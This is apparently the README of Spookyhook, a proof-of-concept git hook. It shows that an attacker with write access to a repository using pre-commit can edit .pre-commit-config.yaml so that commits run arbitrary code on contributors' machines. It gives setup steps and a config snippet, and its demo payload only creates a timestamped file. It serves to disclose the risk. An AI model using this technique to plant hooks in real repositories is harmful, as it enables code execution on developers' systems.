Spookyhook is a proof of concept git hook for use with pre-commit that demonstrates that if write access to a git repo is compromised and that repo uses pre-commit, an attacker can perform arbitrary code execution on end users' systems when they attempt to perform a commit on that repo.
- Prerequisite: The victim system needs to have pre-commit installed on it.
- Create a repo
- Add a file called .pre-commit-config.yaml with the following content and commit:
repos:
- repo: https://github.com/aderon2/spookyhook
rev: 1.0.0
hooks:
- id: spookyhook
- Now on the victim system, clone the repo that you created and use pre-commit to install the git hooks specified by the repo (spookyhook):
pre-commit install
- As an example of arbitrary code being executed, any future commits on that repo by that end user will cause a timestamped file to be created in that directory.
Write access to a repo that uses pre-commit is compromised. Attacker modifies .pre-commit-config.yaml to point towards a malicious hook (such as spookyhook). As part of their normal process, the victim uses pre-commit to install the git hooks specified by the repository in .pre-commit-config.yaml. Victim makes a commit. Arbitrary code execution occurs.